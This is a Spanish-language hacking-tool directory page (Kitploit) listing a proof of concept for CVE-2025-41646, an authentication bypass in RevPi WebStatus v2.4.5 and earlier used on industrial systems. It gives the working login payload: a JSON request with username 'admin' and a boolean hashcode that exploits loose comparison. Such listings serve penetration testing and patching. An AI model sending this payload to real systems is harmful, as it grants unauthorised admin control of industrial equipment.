Skip to content
KitploitKITPLOIT
HerramientasBlog
Enviar
HerramientasBlog
Enviar

¡Herramientas de Hacking, PenTest y Ciberseguridad para tu Arsenal de Seguridad!

Kitploit es un directorio de herramientas de hacking, ciberseguridad y pentesting. Descubre las últimas actualizaciones de proyectos para encontrar vulnerabilidades, analizar sistemas, automatizar pruebas y fortalecer tu seguridad.

··Feeds·Contacto·Privacidad·© 2026 Kitploit

Directorio de Herramientas

Categorías

Ver todas las categorías
Loading categories
CVE-2025-41646---Critical-Authentication-Bypass- — CVE-2025-41646 - Bypass de autenticación crítico | Kitploit
Herramientas/GitHubGitHub/greenforcenetworks/cve-2025-41646---critical-authentication-bypass-
Autenticación y AutorizaciónSeguridad IoTAnálisis de VulnerabilidadesExplotaciónEvasión de IDS/IPSSeguridad SCADA/ICSExplotación de Aplicaciones WebPruebas de Penetración

Más Populares

Ver todos →

Descubre las herramientas más usadas por nuestra comunidad.

Explora todas las herramientas

Explora nuestra colección de herramientas

Ver todas las herramientas →
Compartir
GitHub
greenforcenetworks/cve-2025-41646---critical-authentication-bypass-

CVE-2025-41646---Critical-Authentication-Bypass-

CVE-2025-41646 - Bypass de autenticación crítico

Ver Repositorio
1hace 1 añoAún no revisado

CVE-2025-41646---Bypass-Crítico-de-Autenticación-

CVE-2025-41646 - Bypass crítico de autenticación

🔓 CVE-2025-41646 - RevPi WebStatus Bypass de Autenticación PoC

Una vulnerabilidad crítica de bypass de autenticación (CVE-2025-41646) en RevPi WebStatus ≤ v2.4.5 permite a un atacante iniciar sesión como admin sin credenciales válidas debido a una lógica de comparación de tipos débil (== vs ===).


📌 Afectado

  • RevPi WebStatus v2.4.5 y anteriores
  • Sistemas industriales/de OT ejecutándose en Raspbian con Apache

💥 Explotación

Enviar una solicitud de inicio de sesión con:

root@kitploit:~
{
  "mode": "LOGIN",
  "username": "admin",
  "hashcode": true
}
Descargar herramienta